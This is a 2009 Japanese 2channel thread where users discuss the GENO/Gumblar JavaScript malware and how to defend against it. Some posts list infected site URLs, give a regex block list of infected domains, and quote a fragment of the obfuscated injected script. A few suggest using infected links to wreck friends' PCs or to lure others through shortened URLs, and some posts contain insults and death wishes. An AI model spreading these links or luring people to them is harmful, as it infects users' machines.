21 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 10:08:03.67 ID:8fz7e8f5
たまご氏ね

144 名前： ケンタウレア・モンタナ(コネチカット州)[] 投稿日：2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ

160 名前： ケンタウレア・モンタナ(コネチカット州)[] 投稿日：2009/04/06(月) 11:02:51.43 ID:8fz7e8f5
もう会社行けない
もしかして俺が一番被害大きいんじゃねえの？

185 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 11:09:24.52 ID:8fz7e8f5
お前ら鳥インフルエンザにかかって死んでしまえ
　　　　　~~~~~~~~~~~~~~~~~~~~~~~~~

このときすでにGENOウィルスとインフルエンザの新種を予言していたのか。

>>705
今、キツネはまずいだろ……

だから、電源オフもしたらアカンし、
再起動もしたらアカンのかよＯｒＺ

寝れねぇ〜〜〜〜

>>29
これってfirewallで閉じといたほうが楽じゃね
にしても去年後半あたりから445ポートへのアクセスがすごいことになってるなｗ

ネットを根絶し再び視聴者を取り戻そうとする、
ＴＶ原理主義者達の陰謀だったんだよ！

しかしこうなってくると、携帯厨が「ざまあああああｗｗｗｗｗ」って喜ぶのが目に見えて
なんかイラッとくる

>>707
http://www.forest.impress.co.jp/lib/sys/file/fileuty/hashtabshlex.html
これいれとくと、右クリックでみられるようになる

>711
これ一体どういう経緯の話なんだ？

>>696
でも実際どうなるかわかんねーじゃん？

今からとりあえず全ドライブavastでもう一回検査して、問題なければ消えたら嫌なデータを外付けに移して
外付けはしばらく封印するわｗ

>>702
安心ってのは分かるんだけどね・・・
でもふと気づいたときにサービスやらプロセスやらいじれないのはなんか嫌というか・・・
ていうか制限ユーザにしたらタスクトレイにavast表示されないんだよね・・・

>>698
窓の外に飛び込め

>>719
新ユーザー作ってそっちを管理者にすればよくね
タスクトレイは通知領域いじってもだめなのか？

http://www29.atwiki.jp/geno/pages/14.html


ここの該当IPアドレス云々って書かれてるとこのリンク先って何なの？

>>697
こういうやつらって2chをアングラサイトと認識してんのかな

>>711
＞鳥インフルエンザ
＞鳥インフルエンザ
＞鳥インフルエンザ

>>683
いや、Meもダメだったんじゃね？
RPCの脆弱性付く奴だったから

>>718
汚染中のGENOへの短縮URL貼ってた馬鹿がいて、その短縮URLをzipと勘違いした馬鹿がいたって話

>>699
一昨日までプニルだったけどopera使いやすいぞ
火狐はなんか面倒だったけど、operaは使いやすいわ

>>682
このご時世じゃ解雇の理由の一つになりかねないけどな

このウイルス作った奴死ねばいいのにねー

>>718
前回Geno自体が初出のときに、
Genoのアドレス(www.geno-web.jp)についてさえ気を付けてれば良いと思って油断してた奴らが
TinyURL.comみたいなサイトを使った短縮URLに騙されてアドレスを踏んじゃった

>>718
会社からネットやってたらうっかりGENO踏んじゃって信用丸つぶれってとこじゃないか？
俺んとこでは考えられん情報リテラシーだが……

>>718
休日出勤してるときに会社でzip落としてて
誰かが貼り付けた短縮アドレスでgenoウイルス食らって
首になった人

//www■pref■fukushima■jp/jidou/gakkoutebiki/q8-10■pdf

このサイトやばい？

危険度1000％踏んだけど無事っぽい

恥ずかしながらさっきこのウイルスの情報しったんだけど、
これって代表的なのはこいつでいいの？
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojjsredirr.html

まとめサイトのリンクとかにアンチウイルスのベンダーのリンクないからネタかと思ったよ。
っていうかsophosも確認したの4/30なんだな。

ハッシュも正常な値だった
avastも前から入ってたし

感染はしてないっぽい

さて　明日は職場のマシン総チェックだ
大半は制限ユーザーだから問題ないだろうけど
めんどくせーな

明日以降エロzipスレに短縮URLでウィルスサイト踏ませるか

>>721
それはやった
通知領域いじるのｇ（ｒｙ

ていうかそもそも互換シェル使ってるからそっちの問題もあるし、そしてファイル移すのめんどいから外付け以外はもうどうにでもなーれ


もうなんか今回の件で自分がどれだけチキンか思い知ったわ
安心できねぇ・・・

>726>730
解説サンクス。で会社からアクセスした奴がいたのかｗ
しかもzipと誤認てｗ

>>724
人感染で死亡例があるよ。

>707
ファイルを少しでも改変したらハッシュって呼ばれる文字列も変わってしまうんだよ
>717は右クリプロパティで観れるソフト
↑をいれないとみれないよ

>>737
やった奴らは掘られてるからね
まぁ猶予扱いだったはずだが

>>737
情強なら感染しないから安心だね♪

こんなウイルスだらけのインターネッツに居られるか！
私は自分の部屋で寝かせてもらう！

>>738
vistaか7いれれば？

>>697
私用ネット程度で退職に追い込む会社って・・・
むしろ辞めて正解じゃないの？ｗ
GENOにかかったところで上司が戒告食らう程度だろ、普通は。

>>742
複数板で報告されても2レスまでなら大丈夫だよね！

誰か>>722について教えてくれよ

GENOに掛かるって事が企業にとってどれだけやばいか分かってないなお前

ネットじゃGENOウィルス
巷では豚インフル

しかも関西で二次感染出現したみたいだし

電車乗るのやだなー

>>745
それが一番だが先立つものがね・・・
VMいれてubuntuあたりでネット巡回しようかな・・・

ページ読み込んでる時に閉じたけどせーふ？
cmdとか起動した
なんとかのディスクサイズも大丈夫だった

http://japan.zdnet.com/sp/feature/07zeroday/story/0,3800083088,20392520,00.htm

>>747
１レスで焼かれた携帯がいたなそいや

GENOウイルスと豚インフルウイルスってどっちが強いの？

個人のPCは、７も年末には発売されるし、
コレを期に7のRC入れて年末までがんばるかな

会社のPCはシステム部門の奴らが面倒見てるから、
もうどうにでもなーれ状態だなｗ

むふーなんだか困った感じだね

>>746
え゛？

とりあえずSP1か2だがフラッシュプレーヤーとリーダーを最新にした俺は生き残れるかな

>752
再起動で異変がないか、とタスクマネージャでCPUの使用率に異常がないかチェック

あとはマトメサイトでもみるといいんじゃないかな

>>711
こいつが死霊のえじきで基地にゾンビを引き込む奴に見えてきたわ

>>748
urlなんか踏まねえよ

いまさっきGENOウイルス流れてるって知ったわ
とりあえずは大丈夫みたいだが、おそろしい・・・

豚インフルは弱毒性だし薬剤が効くだけマシだろ

749 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：2009年05月18日(月) 00:33:18 ID:kOR/iv040 (PC)
コマンドプロンプトとregeditが起動できる亜種が出回り始めたらしい（´・ω・） ｽ

>>764
タミフル、リレンザともに有効らしいからな

これウイルス駆除ソフトほとんど意味がないって事だよね
この先対応できるのかしら

Sleipnirなら
オプション→ビュー→Tridentで
デフォルトをJS無効、ActiveXの実行を許可しないようにすればOK

その亜種に感染した人はいるのか

>746
感染だけならシステムの復元でクビは繋がった気がするｗ

同人板のスレでコテハンが湧き始めたな
正直自治厨はがウザイから消えて欲しいんだが
どWikiみれば現時点での対策は全部できるんだしイラネ

他板より

401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
　え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
　作成されるファイルを仮想PCで確保してみました。
　ベンダーに提出するかどうかの判断は各自にお任せします。（一応、KasperskyとAVIRAには送ってあります。）

　gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
　対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
　qlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
　感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
　ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

　あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
　バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
　このマルウェアは、感染時に元の実行ファイル（martuz.cnから落ちてくるxxxx.exe）の方を消去（証拠隠滅）
　するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。


433 名前：401[sage] 投稿日：2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416
嫌なことに、特に異変がない。　
cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe，レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。

あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。　
同人板その他、パンデミック状態になったの理解できるわ。

Noscriptを設定して>>38のサイトを踏んだが問題なかったぜ

アドビにはアクセスして平気なのか？

またvista大勝利か

>>756
面倒見るほうのみにもなってくれよ

通常業務＋全台チェック&対策
全社員への徹底周知

おじさん泣いちゃいそうだよ

>>704
試しに ftp localhost とかやって接続に失敗させてみると、どうなるかな？
書き換わるのなら、感染確認に利用出来そうな気がするんだけど。

>>733
今virustotalに投げてるけど、何かあったのか？

こういうときだけvistaたんは役に立つ　ツンデレなんだね

不用意にネットサーフィンしなければ感染しないんでしょ？

VistaでUACを有効にしてる奴なんているのか？

あれ異常に邪魔だろ・・・

ネットもリアルもフェーズ６に移行直前かよ
今のところvistaんが頑張ってるけど亜種にスルーされたらと思うとネット出来ねえ

>>780
javascript切ってればとりあえずいいよ

>>781
使ってない奴がいるなんて・・

Win7マシンで成美堂出版見てきて、avastインスコして再起動後のスキャンで、
c:users/userneme/appdata/local/microsoft/windows/tenporary internet files/low/content.IE5/RY64BB4P/の
ディレクトリでJS:Redirector-H4確認

発症はしてないと思うけど、ヤバイサイトは見に行かない方が良い

ていうかさ、今回のコレってFTP使用しないPCだと感染してもほぼ無害ってこと？
それとも、FTPのID/PASS強奪はあくまで一面で、キーロガー的に外部にパスとかもらしちゃうの？

>>762
安全だって事は確実
ただ意味が分からない

>>776
マジでお疲れさまッス

うちの会社ではたぶん明日はなんもお触れまわらんだろうな(泣
朝一で全社員へメール流れていたら奇跡だわ･･･orz

MS：「VistaのUACはユーザーをいらいらさせるために搭載した」
http://japan.cnet.com/news/sec/story/0,2000056024,20371347,00.htm

>>781
家出るときに鍵かける奴なんているのか？と同レベル

もうネトサフできないじゃねえかorz

>>776
Javascript切らせますか?現実的じゃない気がして

>>786
FTPの盗聴はあくまで艦船を広げるためのものだろう
後ろでbotnet起動したりしてるみたいだから油断はしない方がよさそうな

Vista+IE8保護モード最強他はクソ

これはMSの陰毛だな

具体的な被害ってあるの？
情報流出先はわからんの？

>>746
50 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。
162 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。
204 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございますけど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。日曜出動までして何してんだろ俺？もう帰宅します。明日上司になんて説明しようか？
995 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。
144 名前： ケンタウレア・モンタナ(コネチカット州)[] 投稿日：2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ
940 名前： ミツマタ(東京都)[] 投稿日：2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように
55 名前： ミツマタ(東京都)[] 投稿日：2009/04/06(月) 18:35:10.80 ID:AhXwTJEf
釣りだと思われるのはしゃくなので
IEの強制終了のせいで発注できず
ウイルスの原因が２CHでエロZIｐ
PCと自前のHDD回収される
生き恥をさらす
大量のロリ画像で性犯罪者扱い
どぷするの？と上司
自主退社←今ここ
このスレに気づかずに管理人に連絡とったのが悔やまれる

Vista最強伝説
Opera最強伝説

対策はしたけど気持ち悪いよう

sqlsodbc.chmを探してたら、spider.exeっていう怪しいファイルが入ってた。
ちょっとWクリックしたら、なんかトランプがたくさん出てきたんで慌てて×を押した。
これウイルスバスターで消したほうが良い？

>>797
ZIPの偽装URL踏んだ人か

UACの何がめんどくさいんだよｗ
インスコの時ぐらいだろ出てくんの
デジタル署名がないって言ってくるならブロック解除してやればいいし意味がわからん
一日一回でるかでないかの話なのに

>>800
スパイダーってゲームを知らんのか

インターネット詳しくないけどvista大丈夫のようね。よかった。

>>797
明日会社行ってこんな話になってたら引く

JavaScriptだけで見るとそれ切るだけで別に済むんだけど
問題の本質はAdobe ReaderとFlashの脆弱性だからな

これってウィルスバスターで検索かければウィルス見つかります？あと これを機にインターネットエクスプローラ７からoperaに乗り換えようと思うのだが如何？ちなみに今はVista32ビットです

>>800
消したほうがいいよ

>>800
壮大にﾌｲﾀｗ

>>800
もう駄目かもしれんね

>>785

>>806
Adobe ReaderとFlash Playerも中で使ってるJavascriptが脆弱性の原因だったり

あれ？JavaScriptが死ねばよくね？

>>812
結局そうなんだけど、一歩間違うとブラウザのJavaScript切るだけで良いんだーになりかねないからね
アップデート忘れんなと

>>792
まずAdobeとか最新Verになってるか確認
なってなきゃ例の確認方法してみる

Javascriptはどうすんだろうね

上の人間がどう判断するかはわからん

ま自分と上司以外は制限ユーザだから大丈夫だとは思うけど

ftp localhost じゃなくて、anonymous サーバに接続してみるという方法もあるな…

やばそうな感じ出してるけどパート５ってどういうことなんだ？
そんなにやばくないのか？

>>797
ああこれ俺だ
無事再就職できました

もっとGENOウイルス広まれよ

飽きてきた

>>816
大騒ぎしている人間も居るが冷静な判断をしたら
そう大変じゃなかったんだぜの巻き

>>817
よかったな

>>817
おめでとう

>>787
書いてあるとおり、遮断した方が良いんじゃね？っていうIPアドレスの範囲じゃないの？

ＩＰブロック指定ﾏﾝﾄﾞｸｾ

もういいや、寝よう。
ていうか明日は会社の自分のPCも確認せにゃならんし、親のPCも心配だし

>>817
何その良い話

>>817
よかったな
お祝いに今度zipやるから会社で落としてくれ

>>825
warota

知らんけどwikiのIPは実行ファイルを送りつけてくるとこじゃないの

JavaScriptとかこの世から消滅しろよ〜

>>817
また偽装アドレス踏んでこいよ

>>825
あれからZIPは落としてないｗ
つうかHDDも全部処分した
結構本気で反省したわ

>>785
ネットの一時ファイルだな・・・

vistaの奴はもう寝ろ。

俺毎回ｳｲﾙｽスレ見つけると焦るんだけど
良く考えたらそんなにもれて困るデータもないし
クレジットカードも使ってないし
ハゲるわ〜

>>830
性犯罪者扱いされた気分はいかがかね

こういうのだとほっとしないか？
http://up2.viploader.net/pic/src/viploader1020375.gif

>>830
そのままニートになって死ねばよかったのに

>>830
処分する前に公開鯖立てて欲しかったな。

とりあえずFP最新版にしてNoScript入れてフラッシュ切った

>>830
ロリコン乙

何とでも言え
悪いのは自分だ

とりあえず会社のFTPのパスワードだけ変更しておいたぜ
システム担当者として明日以降が思いやられるわマジで・・・

とりあえず家のPCは全部入ってるアドビアップデートさせた

こうやって強くなっていくんだな

怖くてメールチェックできない(´･ω･`)
でもチェックしないと大量に(´･ω･`)

家族用のPCのXPのやつに対策してみたけど、父親とか何もわからずに実行しそうで怖いわｗ
アドミニストレータ権限なくせば万全かしら？

特定のサイトだけＦＬＡＳＨとかＪＳとかオンにでききるような設定とかできないののの？

ほう、経験が生きたな

>>840
次は何の仕事？

Operaに続いてVistaが最強伝説を確立してしまったのか

二次元も三次元もパンデミックでござる　の巻

>>846
IEなら信頼済みサイトとかに割り振ればレベルによってActiveX切ったり出来る
FirefoxならNoScriptとかでサイトごとに切れる

ただし全面停止推奨だな今は
次訪問したときに感染してないとは限らないのが恐ろしい

>>846
それが手軽に出来るのがOpera。最近悪さして話題になったNoScript使いたいのならFirefox
どうぞ御自由に

三次元のパンデミックのほうも府庁からお知らせが来るんだろうな

成美堂踏んじゃったけど50.727バイトって出たから大丈夫？

くだらないデマだがやり口が悪質

>>852
別にOperaだけじゃねーだろ

Troj/JSRedir-R is a malicious script likely to have been injected into a defaced web page to load remote malicious content when the page is viewed.
Analysis of many defaced sites has shown that many examples of Troj/JSRedi-R are buggy and do not work.

Websites affected with Troj/JSRedir-R may also see detections of Troj/PHPMod-A.

Working copies of Troj/JSRedir-R will redirect users to a Chinese Domain (hosted in Russia) and then via a series of PDF and SWF exploits attempt to install malware detected as Troj/Daonol-Fam.

For more information on this threat see the SophosLabs Blog.

www.sophos.com/security/analyses/viruses-and-spyware/trojjsredirr.html

>>856
じゃあ一緒に教えましょ

VistaUserはもうあんま関係ないからあらしと咲見て寝ようぜｗ

同人板ってだいぶ前からウィルス攻撃されてたろ
あれも作った奴が少しずつ改良して運営と住人の対策無効化してたよなあ
そんで今回のは自分で勝手に改良して進化いくわけか
災難だな同人

もう再起動出来たしいいや寝る

java切るわけにはいかないんでFLASHとAdobe reader無効にしてる
不便すぎる

まとめサイトが感染したらどうなるんだろう

やっぱシルバーライト最強だな。

寝る前の最終チェック

1.avastのインスコとwebスキャナの有効化
2.adobe製品を使わない。使うなら最新版を。 adobe reader 9.1.1　flash player 10.0.22.87
3.Foxitreader 等PDFreaderはjavascriptでの操作は不可に
4.IE8に乗り換え
5.全ブラウザでjavascript・activeXの実行不可

で、大丈夫だよな
あとは明日Gumblar 関連のIPブロック設定して、VMでUbuntu入れて終了
寝る。寝るったら寝る。

ﾏﾏﾝにMacbookでも買ってやるか

>>864
あーっw

UACって何？

>>868
自称情強チェッカー

携帯がハイテクになればなるほど
感染力と症状が尋常じゃないウイルスが
いずれ携帯にも現れるんだろうなと思うと怖いですね

GENOCIDEウィルス？

これってmeたんでも感染すんの？

このサイトってGENOウィルスに感染してるの？
http://www.nifty.com/

>>873
してない

亜種の話広めとかないとヤバくないか？
つか止められなくないかコレ

>>872
多分寝込む

http://www.amazon.co.jp/Windows-Vista-Ultimate-SP1-%E3%82%A2%E3%83%83%E3%83%97%E3%82%B0%E3%83%AC%E3%83%BC%E3%83%89/dp/B0016704AW/ref=dp_cp_ob_sw_title_2
http://www.amazon.co.jp/Windows-Vista-Business-SP1-%E3%82%A2%E3%83%83%E3%83%97%E3%82%B0%E3%83%AC%E3%83%BC%E3%83%89/dp/B00167047U/ref=pd_cp_sw_3?
pf_rd_p=102768606&pf_rd_s=center-41&pf_rd_t=201&pf_rd_i=B00166W0OQ&pf_rd_m=AN1VRQENFRJN5&pf_rd_r=1Y1ZKJ1YY7234YHF9RHR
http://www.amazon.co.jp/Windows-Vista-Home-Premium-%E3%82%A2%E3%83%83%E3%83%97%E3%82%B0%E3%83%AC%E3%83%BC%E3%83%89/dp/B001671QM2/ref=sr_1_3?ie=UTF8&s=software&qid=1242577313&sr=1-3

さあ、XP(クソピー)厨は寝る前にコレをちゅうもんしなさい

>>874
ニフティって感染してるって書き込みみたけど
デマかｗ

>>877
煽りたい気分は分かるが余計なURLは張るな

>878

>115嫁

こっちのウィルスも怖いが
大阪に通勤してるからインフルもこえーな

Vista の UAC (ユーザーアカウント制御)
Java スクリプトやactive Xなどを実行しようとすると
「あなたの許可が必要です」と警告してくる) が有効であれば、
(不用意に 「続行」 ボタン押さなければ) 感染しにくい

GENOウイルス

Temporary フォルダにウィルス本体 (Java スクリプト) をダウンロードし、
Adobe Reader や Flash Player のバッファオーバーフローの脆弱性を利用して
当該スクリプトを実行することにより、ウィルスに感染させるらしい。

バッファオーバーランとはすごいな
しかし、comodo memory firewallを入れている俺に死角はなかった

http://www.nifty.com/
自体は感染していないが、似たようなサイトがあるんだなｗ

>>877
今晩のカレーが不味かったから、明日からはウンコを食えって言われてもなあｗ

通ぶってわざわざＸＰにダウングレードした素人に正義の鉄鎚ｗｗｗｗ

http://p-frying.com/
http://www.zengozen.co.jp/pic/keturosyumire-syonn.htm
http://skyhighpremium.com/
http://sound.jp/yudai_marimba/
http://www.thesis-report.com/
http://www.joyjoynet.com/
http://www.ti-a-ra.com/
http://www1.odn.ne.jp/revue1999/
http://www.nifty-hair.com/
http://www.k-q-bury.com/
http://expss.main.jp/expss2/2005/01/
http://www.livmail.com/

>877
％で区切られた2桁の16進数っぽいのは検索に使ったキーワードかな？

その辺は削っても商品画面にリンクは張れると思うんでテスト
ttp://www.amazon.co.jp/dp/B0016704AW

>>886
わざわざXPにダウングレードしたような情強はAdobeのアップデートもしてるだろｗ
そういう事も判らないからVista厨は情弱って言われるんだよｗｗｗ

>>38
何かこれ貼りまくってる人がいるんだけど

>>886
あれはマジで情弱というかなんかの意地だろうなｗ
microsoftと闘ってるという自意識でもあんのかな

>>886
わざわざセキュリティの高いVISTAを蹴ってXP（笑）にダウングレードする企業もたいしたもんだよな

Vistaｶｽ今までの雪辱を晴らそうと必死で大暴れ(笑)

最低の情弱はVista買った上に管理者権限常用でUAC切ってる奴

もしかしてルータの電源をひっこ抜いとけば感染しないんじゃね？

win使ってるくせに負け組ざまあｗｗｗｗｗｗｗｗｗｗｗｗ

対策無しで安全なVista
かたや穴だらけのゴミカスOS　Xp

アマゾンのアドレスがなんで長くなるのか情強の人の解説希望

E3と83が大杉だけどなんの意味あるんだ？

つまり
VISTA=情弱専用

>>895
ﾋﾞｸｯ

いちいち確認出てくるの面倒なんだもん

>>894
どこの俺だよ

どうでもいいが今日教習所での応急救護のとき
心臓マッサージする人形が俺と同じユニクロの服きててきまずかった。

【新インフル】国内感染者、すでに１千人規模か・・・★2
http://tsushima.2ch.net/test/read.cgi/news/1242575410/728

728 名前： 水芭蕉(dion軍)[] 投稿日：2009/05/18(月) 01:36:38.14 ID:ayChtY8G ?BRZ(10006)
http://img.2ch.net/ico/gikog_gomibako4.gif
どうでもいいが今日教習所での応急救護のとき
心臓マッサージする人形が俺と同じユニクロの服きててきまずかった。

>>898
アマの中のリンクは全部
http://www.amazon.co.jp/商品名/dq/商品コード/参照パラメータ
の形式になってるから

%E3とか%83はそのままだとURLに含むことが出来ない文字をURLに含むための処理

XPで仮想PCの中のうぶんちゅからこのスレに書き込んでる俺から見たらかなり笑えるよこのスレ

リカバリ大変だったから感染したくないでもう
さっさと駆除できるようにしてくれ　あとadobeはくそ過ぎる

>>902
ちんこは相変わらずかわいいなぁｖ

>>905
うぶんちゅってlinux系だっけ？うろおぼえｗ
linuxの練習台くらいには使えるんだろうか、とか妄想

>>905
ビビりまくりじゃねえかw

628 名前：名無しさん＠明日があるさ[] 投稿日：2009/05/18(月) 01:24:17 O
どうでもいいが今日教習所での応急救護のとき
心臓マッサージする人形が俺と同じユニクロの服きててきまずかった。

自称情強さんはwin自動更新とかUAC切っちゃったりする割に
アンチウイルスソフトにだけは拘ってantivirとか入れてたりするのから困る

うんこつぶ♪

>904
つ 良解答20ポイント

ノートン先生をうｐでーとしとけばおｋ？

ウイルスにやられたＸＰ厨の悲鳴が心地よいｗｗ

175 名前：以下、名無しにかわりましてVIPがお送りします[sage] 投稿日：2009/05/18(月) 01:56:07.26 ID:Mqh09pCS0
http://www.dotup.org/uploda/www.dotup.org39118.jpg

＼(^o^)／

>>914
テスト機で調べてみたけど無理っぽい。
なんかやっかいなウイルスですな。

　⊂( ﾟдﾟ )　ｹﾞﾞﾎｯｹﾞﾉﾎｯ
　　 ヽ ⊂ ）
　　 （⌒）｜　ﾀﾞｯ
　　　三 `Ｊ

/　　Ｏ　|￣|　Ｏ　 ヽ
|　　　　/　｜　　 　 |　ｹﾞﾉｯｹﾞﾉGｯﾎ
ヽ、. 　├ｰ┤　 　 ノ ｹﾞﾎﾎｯGENOｯ

>>916
jpgでも恐くて踏めぬ

XPの悲鳴で今日も飯がウマい！

みんなもうふつうにネトサフィしてるの？

いまからオナニーしようと思うんだけど
有名所エロサイトでやばいところってどこ？

>>919
例のchmが改竄食らってる画像ｗ

vista土壇場の大逆転で
またもや俺らν速民大勝利だな

>>898
/dqより前の部分を削っても同じ内容が表示される
コピペするときはそっちを使うほうがいい

Vistaｶｽ今までの雪辱を晴らそうと必死で大暴れ(笑)

afi2000\.web\.fc2\.com
crestronjapan\.com
expss\.main\.jp/expss2/2005/01
geno\.co\.jp
geno-web\.jp
hobbycomplex\.com
joyjoynet\.com
juicyrock\.co\.jp
k-q-bury\.com
livmail\.com
mag-puppine\.com
naxos\.co\.jp
nifty-hair\.com
odn\.ne\.jp/revue1999
p-frying\.com
rakuten.ne.jp/gold/i-na
skyhighpremium\.com
sound.jp/yudai_marimba
thesis-report\.com
ti-a-ra\.com
zengozen\.co\.jp

これ以外の感染URLの一覧載ってるサイトとかしらない？
NGExに入れときたいんだけど

なになに
ここに来てvistaが大勝利したのか

>>921
しない
俺は臆病だから今日までこの戦場で生き残ってこられた

>925
お前も良い奴だな　宝くじ4等ぐらい当たると思うよ

Linuxでよかった

>927
無修正DVDの大手っぽいところが感染してるなｗ　被害者多そうだ

＼(^o^)／

ＸＰ厨（笑）もっと喚け
上から見下ろす地獄絵図は爽快だ

avastのクイックスキャンしてたらブルースクリーンなったんだがwwwwwwww

N速菌が伝染るから寄ってくんなよおまえら

>>921
vistaならリボンマジック見に行っても成美堂見に行っても全然へーきだった

νista大勝利！

ＦＣ2感染してるってことはＦＣ2会員全滅ってこと？

いや、これ、『何処のサイトが感染してるか分からない』ってのは怖いねえ
XPで自動通知もないアドベの更新してなければ、サイトを開いた瞬間アウトってｗｗ

ところで、本当にアドベ経由だけかぁ？

ごしゅじんさま、いままで、とてもたのしかたです。

よくういるすにかんせんしてしておこられたけど、やくにたたなで、ごめんなさい。

ごしゅじんさまが、いれるよていの、びすたはあたしのいもおとです。

いもおとだけど、あたしみたいに、やくたたずではありません。

すなおなこで、からだもじょうぶです。

すたいるもいいから、ほんとはちょっと、くやしいです、

いもとを、かわいがってもらえると。おねえさんとして、うれしいです。

いままでつかえないこで、・ごめんなさい..

そして、つかってくれて、ありがとおゴザいました。

あたしは、もう、きえちゃうけれど￥、さいごに、おねがいがあります。きいてくれると、うれしいです。

ごしゅじんさまの、もっている、えくすぴーのディすく、すてないでください。

あたしが、はいっています。いまのあたしじゃ、ないけど、あたしです。

どきどきみたり、さわったり。、してくれるとうれしいです。

ごしゅじんさまにあえて、えむいは、

しあわS

Linuxって難しいんだろ？
タダなんだっけ

vista大勝利もなにも元から叩いてたのって低スペックの嫉妬に踊らされてた情弱だけじゃないか

未だにMeなんて使ってる奴は病気としか思えん。

Windows Updateにアクセスできねえ

＼(^o^)／

>>937

スレタイ半角やめろよ。検索引っかからないだろ

yourfilehostもアウトじゃどうしようもねーわ

http://blog.livedoor.jp/needlessneet/archives/51217759.html

98SEなので大丈夫です

数日前からえらい重かったのはこれだったのか？？
やばい。つかねる。

>>940
難しいけど、触らなきゃ始まらないと思う。

239 名前：以下、名無しにかわりましてVIPがお送りします[] 投稿日：2009/05/18(月) 02:12:44.09 ID:mr3CIm+w0
バガボンドで武蔵に興味持って五輪の書読もうと思ったらコレだよ糞が

tp://www.geocities.jp/themusasi2/
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう！
絶対に踏んではいけません。

ていうかＣ：￥windowsがない…？？

>>951
＞replace(QW73,xzGAd);var vaCRk=unescape(z2oY);eval(vaCRk)})(/\~/g)

ああ、ありますね確かに

avast入れて
アドビのリーダーとフラッシュ最新にした
これでＯＫ？

>>951
普通に開いてしまったｗ

>>954
とりあえずはそれでおｋ

>>955
それってやばいんじゃ

XPで擬似UAC環境構築できた！これで勝つる！

>>957
js切ってりゃ何の問題もない
今はね

http://azcji.cocolog-nifty.com/blog/cat1459704/index.html
危険度1000%
超絶危険なURLです。友人の古いPCをフリーズさせるのに利用しましょう！
絶対に踏んではいけません。

　 ＿＿＿＿＿
　|＼ ◎-----､＼　　　　 人人人人人人人人人人人人人人人人人人人人人人人人人人人人人
　| 　＼丶-----ヽ＼　＜ すごい一斗缶を感じる。今までにない何か便利な一斗缶を。　　　　　　 ＞
　|　　 ｜￣￣￣￣｜＜ 形状・・・なんだろう定められている日本工業規格（JIS規格）に。　 　 　 ＞
　|　//｜　 ＼　／　|　＜ 天板、地板は一辺の長さが238.0±2.0mm、高さは349.0±2.0mm、　　　＞
　|　　 ｜　（ﾟ）=（ﾟ） ｜＜ 質量は1140±60g、容量は19.25±0.45リットルと定められている。　　　　＞
　|　　 ｜　 ●_●　｜＜ 規格の大元は、一斗=十升（約18.039リットル）を基準に考案されている。＞
　|　　 ｜ 　 　　　　 |　＜ 5ガロン缶とも呼ばれていた時期もある。(1ガロン = 3.7854118リットル)　＞
　＼　 ｜ 〃----ヾ |　＜ 5ガロンと18リットルで、5月18日は18リットル缶の日だよ。　　　　　　　　 ＞
　　 ＼｜＿＿＿＿｜　　YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

>>960
４０４ぽいけど

adobe readerのjavascriptきったぉ

vistaだしＪava切ってるけど怖くて眠れない

>>960
いつでもレタスじゃんｗｗ

やったー感染してたよー

＼(^o^)／
Pen4のせいでリカバリ出来ん

>>957
XPだけどアドビ系最新だしノースクリプト入れてるし大丈夫
ノースクリプトは間違ってブラクラ開いちゃった時とかにも効力発揮するし便利

>>960
Vistaで余裕です(^^)

いつでもレタス
常識を覆す栽培方法方法で、四季を通して栽培出来ます、室内の栽培にも対応します。
土を使わないで清潔、早期、多収穫が期待出来ます、冬のレタス栽培は得意とします。

>>966
どんな症状出た？

>>5
こ　これは

GENOウイルスチェッカー(まとめも充実)
ttp://geno.2ch.tc/

Jane使っている人は
ツール-設定-コマンドで
コマンド名　適当
実行するコマンドに　http://geno.2ch.tc/index.php?url=$TEXT$LINK
ってやるとなぞり検索でチェックできる

GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

GENOウイルススレ　★13
http://pc11.2ch.net/test/read.cgi/sec/1242576033/

【管理も】同人サイト・GENOウィルス注意7【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242565127/

